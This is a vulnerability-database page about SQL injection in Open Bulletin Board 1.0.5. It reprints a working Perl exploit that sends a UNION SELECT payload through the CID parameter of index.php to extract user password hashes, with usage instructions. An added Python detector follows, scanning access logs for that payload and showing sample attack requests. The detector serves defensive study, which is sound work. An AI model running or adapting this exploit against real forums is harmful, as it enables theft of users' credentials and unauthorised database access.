Open Bulletin Board 1.0.5 – SQL Injection


Vulnerability ID: 1055262
Vulnerability type:
Published: 2005-07-18
Updated: 2005-07-18
CVE ID: N/A
CNNVD-ID: N/A
Platform: PHP
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/1111
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
#!/usr/bin/perl -w

# OpenBB sql injection
# tested on Open Bulletin Board 1.0.5 with mysql
# (c)oded by x97Rang 2005 RST/GHC
# Gr33tz:  __blf, 1dt.w0lf

use IO::Socket;

if (@ARGV != 3)
{
   print "\nUsage: $0 [server] [path] [id]\n";
   print "like $0 forum.mysite.com / 1\n";
   print "If found nothing - forum NOT vulnerable\n\n";
   exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];

# The CID parameter of index.php reaches the SQL query unsanitised, so a UNION SELECT can be appended to it.
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80");
printf $socket ("GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
 $path,$server,$id);

# Print any 32-character word found between tags in the response.
while(<$socket>)
{
    if (/>(\w{32})</) { print "$1\n"; }
}

# milw0rm.com [2005-07-18]
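For defenders, the request above leaves a recognisable trace in web server access logs. The following is an added example, not part of the original exploit or of OpenBB: it classifies the CID parameter of index.php requests, assuming CID is meant to be a plain integer (as the `CID=999` prefix suggests) and that logs use the common/combined format. The sample log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL tokens used by the request on this page; a heuristic, not a SQL parser.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|/\*|--", re.I | re.S)

def classify_cid(log_line):
    """Return 'ok', 'non-numeric' or 'sqli' for an index.php request's CID,
    or None when the line is not an index.php request carrying CID."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("CID")
    if values is None:
        return None
    verdict = "ok"
    for raw in values:                  # parse_qs has already decoded once
        if re.fullmatch(r"[0-9]+", raw):
            continue
        verdict = "non-numeric"
        if SQLI_RE.search(unquote_plus(raw)):   # second decode: %2520 etc.
            return "sqli"
    return verdict

def flag_requests(lines):
    """Return (verdict, line) for every CID request that is not a plain integer."""
    hits = []
    for line in lines:
        verdict = classify_cid(line)
        if verdict in ("non-numeric", "sqli"):
            hits.append((verdict, line))
    return hits

# Constructed sample log lines (documentation IP range 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2005:10:00:01 +0000] "GET /index.php?CID=3 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [18/Jul/2005:10:00:07 +0000] "GET /forum/index.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=1/* HTTP/1.0" 200 4870',
    '192.0.2.44 - - [18/Jul/2005:10:00:09 +0000] "GET /index.php?CID=999%2520UNION%2520SELECT%25201 HTTP/1.0" 200 4870',
    '192.0.2.51 - - [18/Jul/2005:10:01:30 +0000] "GET /index.php?CID=abc HTTP/1.0" 200 300',
    '192.0.2.10 - - [18/Jul/2005:10:02:00 +0000] "GET /images/logo.gif HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for verdict, line in flag_requests(SAMPLE_LOG):
        print(f"{verdict:12} {line}")
```

Any `non-numeric` hit is worth reviewing even without SQL keywords, since a well-formed client would only ever send an integer under the stated assumption.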
